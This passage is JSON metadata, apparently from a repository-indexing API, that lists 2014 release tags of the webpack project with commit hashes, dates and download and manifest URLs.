":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.